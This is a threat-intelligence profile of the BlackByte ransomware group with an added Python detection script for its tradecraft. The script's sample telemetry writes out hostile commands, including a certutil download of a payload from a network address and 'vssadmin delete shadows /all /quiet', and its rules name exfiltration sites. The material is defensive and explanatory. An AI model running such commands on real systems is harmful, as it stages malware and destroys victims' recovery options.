| BlackByte | |
| --- | --- |
| Date of Initial Activity | 2021 |
| Suspected Attribution | Ransomware Group |
| Targeted Countries | Peru |
| Associated Tools | BlackByte Malware |
| Motivation | Financial Gain |
| Software | Windows |
Overview
BlackByte is a ransomware group that first emerged in July 2021 and quickly gained attention for its aggressive targeting of critical infrastructure sectors and its sophisticated tactics. Operating on a Ransomware-as-a-Service (RaaS) model, BlackByte enables affiliates to deploy its ransomware, further expanding its reach. While it shares many characteristics with other ransomware families, such as exploiting known vulnerabilities and leveraging phishing techniques for initial access, BlackByte stands out due to its evolving encryption strategies and use of custom-built tools. In particular, it made headlines in 2021 when it attacked a variety of industries, including government, financial, and food sectors, marking its presence on the global threat landscape.
One key aspect of BlackByte’s operations is its continuous adaptation to security measures. Initially, it used a symmetric key encryption model, which allowed for the development of a decrypter. However, after researchers released a tool to help victims, BlackByte quickly upgraded its encryption methods, implementing a more complex multi-key strategy that made decryption more difficult. This response underscores the group’s focus on maintaining a foothold in the ransomware space and avoiding the setbacks faced by earlier ransomware variants. As a result, it has maintained a steady pace of activity, with a notable uptick in attacks against Latin American targets, particularly government entities, in 2022.
Common targets
- Information
- Individuals
- Peru
- Chile
- Turkey
- India
- Netherlands
- United States
- United Kingdom
- Philippines
Attack Vectors
- Phishing
- Credential-based Attacks
- Software Vulnerabilities
How they operate
The first step in a BlackByte attack typically involves gaining initial access to the victim’s network. The group has been known to exploit vulnerabilities, such as the ProxyShell flaw in Microsoft Exchange servers, which allows attackers to execute remote code and establish a foothold on the system. Alternatively, BlackByte uses phishing emails containing malicious payloads to trick users into executing the malware. Once the group gains access to the target environment, it deploys a custom tool called “Cobeacon” using the built-in Windows utility certutil, which enables further escalation and lateral movement.
Once BlackByte has established control over the victim’s system, the next step is discovery and lateral movement. Using tools like NetScan, the attackers conduct reconnaissance to understand the network topology and identify valuable targets. They then deploy AnyDesk, a legitimate remote access tool, to maintain control over the infected system and move laterally within the network. This technique allows BlackByte operators to deepen their access, reaching critical systems and increasing the likelihood of successful encryption. During this phase, BlackByte also terminates specific security processes to evade detection and hinder the effectiveness of endpoint protection.
Data exfiltration is a critical component of BlackByte’s operations, as the group seeks to steal sensitive information before deploying its ransomware. The malware uses WinRAR to archive important files and then uploads them to file-sharing sites such as anonymfiles[.]com or file[.]io. This step ensures that BlackByte operators have a copy of the stolen data, which can be used for double extortion, a tactic where the attacker threatens to leak the stolen data unless the ransom is paid. After the data has been exfiltrated, BlackByte proceeds to encrypt the victim’s files using a custom encryption mechanism.
The encryption process used by BlackByte is one of its defining features. Early versions of the ransomware employed symmetric AES encryption, which allowed researchers to develop a decryption tool. In response, BlackByte evolved its encryption strategy, implementing a more complex system that combines AES and RSA encryption. The ransomware generates an AES-128 key, which is encrypted with an RSA key. This layered encryption ensures that files cannot be decrypted without access to the private RSA key, making recovery without paying the ransom nearly impossible. Additionally, BlackByte deletes system shadow copies using the “vssadmin” command, further complicating recovery efforts for victims.
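The four phases above (certutil-based payload staging, NetScan and AnyDesk for discovery and remote access, WinRAR archiving followed by uploads to anonymfiles[.]com or file[.]io, and vssadmin shadow-copy deletion before encryption) each leave a distinct trace in endpoint and network telemetry. The following is an added example written for this page, not code from any vendor or from the profile itself: a small rule set that classifies flattened process-creation and network-connection events and then correlates them per host into the archive-then-upload and upload-then-wipe-shadows sequences the text describes. The key=value log format, the host names, timestamps, paths and IP address are all constructed for the example; the only real identifiers are the tool names and exfiltration sites named on the page, plus well-known certutil and vssadmin switches.

```python
"""Detection rules for the BlackByte tradecraft described on this page,
run over constructed sample telemetry. Added example, not page-provided code."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry). One flattened process-creation
# or network-connection record per line, in key=value form; values with spaces
# are double-quoted. The first certutil line is a benign hash check and must not fire.
SAMPLE_EVENTS = r'''
ts=2024-01-10T08:00:00Z type=process host=WS02 user=CORP\asmith image=C:\Windows\System32\certutil.exe cmdline="certutil.exe -hashfile C:\temp\installer.msi SHA256"
ts=2024-01-10T09:12:01Z type=process host=WS01 user=CORP\jdoe image=C:\Windows\System32\certutil.exe cmdline="certutil.exe -urlcache -split -f http://198.51.100.7/svc.bin C:\Users\Public\svc.exe"
ts=2024-01-10T09:14:22Z type=process host=WS01 user=CORP\jdoe image=C:\Users\Public\netscan.exe cmdline="netscan.exe"
ts=2024-01-10T09:20:05Z type=process host=WS01 user=CORP\jdoe image=C:\Users\Public\AnyDesk.exe cmdline="AnyDesk.exe"
ts=2024-01-10T10:02:44Z type=process host=FS01 user=CORP\svc_backup image="C:\Program Files\WinRAR\rar.exe" cmdline="rar.exe a -r C:\Users\Public\docs.rar \\FS01\Finance"
ts=2024-01-10T10:05:10Z type=network host=FS01 user=CORP\svc_backup dst_host=file.io dst_port=443 bytes_out=52428800
ts=2024-01-10T10:07:31Z type=process host=FS01 user="NT AUTHORITY\SYSTEM" image=C:\Windows\System32\vssadmin.exe cmdline="vssadmin.exe delete shadows /all /quiet"
'''

# File-sharing sites named on the page as BlackByte exfiltration destinations.
EXFIL_SITES = {"anonymfiles.com", "file.io"}


def parse_event(line):
    """Parse one key=value line into a dict; quoted values may contain spaces."""
    fields = {}
    for key, raw in re.findall(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)', line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    fields["ts"] = datetime.strptime(fields["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return fields


def classify(ev):
    """Return the rule names a single event matches."""
    hits = []
    if ev["type"] == "process":
        cmd = ev.get("cmdline", "").lower()
        exe = ev.get("image", "").lower().rsplit("\\", 1)[-1]
        # certutil fetching from a URL (payload staging), not its normal hashing/cert use
        if exe == "certutil.exe" and ("-urlcache" in cmd or "http" in cmd):
            hits.append("certutil_download")
        # shadow copies removed to sabotage recovery before encryption
        if exe == "vssadmin.exe" and "delete" in cmd and "shadows" in cmd:
            hits.append("shadow_copy_deletion")
        # WinRAR 'a' (add) command building an archive: data staging for exfiltration
        if exe in ("rar.exe", "winrar.exe") and re.search(r"\brar(\.exe)?\s+a\b", cmd):
            hits.append("archive_staging")
        if exe == "anydesk.exe":
            hits.append("remote_access_tool")
        if exe == "netscan.exe":
            hits.append("network_scanner")
    elif ev["type"] == "network":
        if ev.get("dst_host", "").lower() in EXFIL_SITES:
            hits.append("exfil_site_upload")
    return hits


def correlate(lines, window=timedelta(minutes=30)):
    """Classify every line, then chain rule hits per host within `window`:
    archive -> upload (double-extortion exfil) and upload -> shadow deletion
    (recovery sabotage immediately before encryption)."""
    per_host = defaultdict(list)
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        for rule in classify(ev):
            per_host[ev["host"]].append((ev["ts"], rule))
            alerts.append((ev["host"], rule))
    chains = []
    zero = timedelta(0)
    for host, hits in per_host.items():
        hits.sort()
        staged = [t for t, r in hits if r == "archive_staging"]
        uploaded = [t for t, r in hits if r == "exfil_site_upload"]
        wiped = [t for t, r in hits if r == "shadow_copy_deletion"]
        if any(zero <= u - s <= window for s in staged for u in uploaded):
            chains.append((host, "double_extortion_exfil"))
        if any(zero <= w - u <= window for u in uploaded for w in wiped):
            chains.append((host, "pre_encryption_recovery_sabotage"))
    return alerts, chains


def run_sample():
    """Run the rules over the constructed sample; returns (alerts, chains)."""
    return correlate(SAMPLE_EVENTS.splitlines())


if __name__ == "__main__":
    sample_alerts, sample_chains = run_sample()
    for host, rule in sample_alerts:
        print(f"ALERT  {host:<5} {rule}")
    for host, chain in sample_chains:
        print(f"CHAIN  {host:<5} {chain}")
```

The individual rules are deliberately loose (a benign admin may well run AnyDesk or WinRAR), which is why the value is in the per-host chaining: an archive created on a file server, an upload to one of the named sharing sites minutes later, and then `vssadmin delete shadows` from the same host is a sequence with very few legitimate explanations, and catching it at the archive or upload step leaves a window to act before encryption starts.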
Finally, BlackByte concludes the attack by leaving a ransom note demanding payment in cryptocurrency in exchange for the decryption key. The note also includes a warning not to use publicly available decryption tools, as they are ineffective against the newer versions of the ransomware. This commitment to innovation and its RaaS model has allowed BlackByte to maintain a significant presence in the ransomware landscape, with its operators continuously refining their tactics to stay ahead of security measures.